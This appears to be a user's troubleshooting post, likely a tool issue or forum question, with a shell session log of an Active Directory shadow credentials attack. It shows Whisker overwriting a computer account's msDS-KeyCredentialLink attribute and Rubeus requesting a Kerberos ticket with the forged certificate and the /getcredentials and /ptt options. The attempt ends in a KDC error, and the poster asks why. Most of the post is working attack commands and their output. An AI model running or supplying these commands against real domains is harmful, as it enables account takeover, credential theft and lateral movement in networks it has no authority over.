Open
Description
```
Process 5800 created.
Channel 3 created.
Microsoft Windows [Version 10.0.20348.2849]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd C:\Windows\Tasks
cd C:\Windows\Tasks

C:\Windows\Tasks>.\Whisker.exe clear /target:target$ /domain:domain.local /dc:dc.domain.tld
.\Whisker.exe clear /target:target$ /domain:domain.local /dc:dc.domain.tld
[*] Searching for the target account
[*] Target user found: CN=target1,CN=Computers,DC=domain,DC=tld
[*] Updating the msDS-KeyCredentialLink attribute of the target object
[+] Updated the msDS-KeyCredentialLink attribute of the target object

C:\Windows\Tasks>.\Whisker.exe add /target:target$ /domain:domain.local /dc:dc.domain.tld
.\Whisker.exe add /target:target$ /domain:domain.local /dc:dc.domain.tld
[*] No path was provided. The certificate will be printed as a Base64 blob
[*] No pass was provided. The certificate will be stored with the password Akd98WkcpFnq0UBY
[*] Searching for the target account
[*] Target user found: CN=target$,CN=Computers,DC=domain,DC=tld
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID ed51852e-b8f8-4a60-a7f1-c744e74da321
[*] Updating the msDS-KeyCredentialLink attribute of the target object
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] You can now run Rubeus with the following syntax:

Rubeus.exe asktgt /user:target$ /certificate:MIIJ0AIBAzCCC<snip> /password:"Akd98WkcpFnq0UBY" /domain:domain.tld /dc:dc.domain.tld /getcredentials /show

C:\Windows\Tasks>Rubeus.exe asktgt /user:target$ /certificate:MIIJ0AIBAzCCC<snip> /password:"Akd98WkcpFnq0UBY" /domain:domain.tld /dc:dc.domain.tld /getcredentials /show /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3

[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=ZPH-target$
[*] Building AS-REQ (w/ PKINIT preauth) for: 'domain.local\target$'
[*] Using domain controller: 192.168.210.10:88
[X] KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP
```
I'm trying to exploit a computer object using shadow credentials.
Does anyone have any idea why I'm getting the error shown above?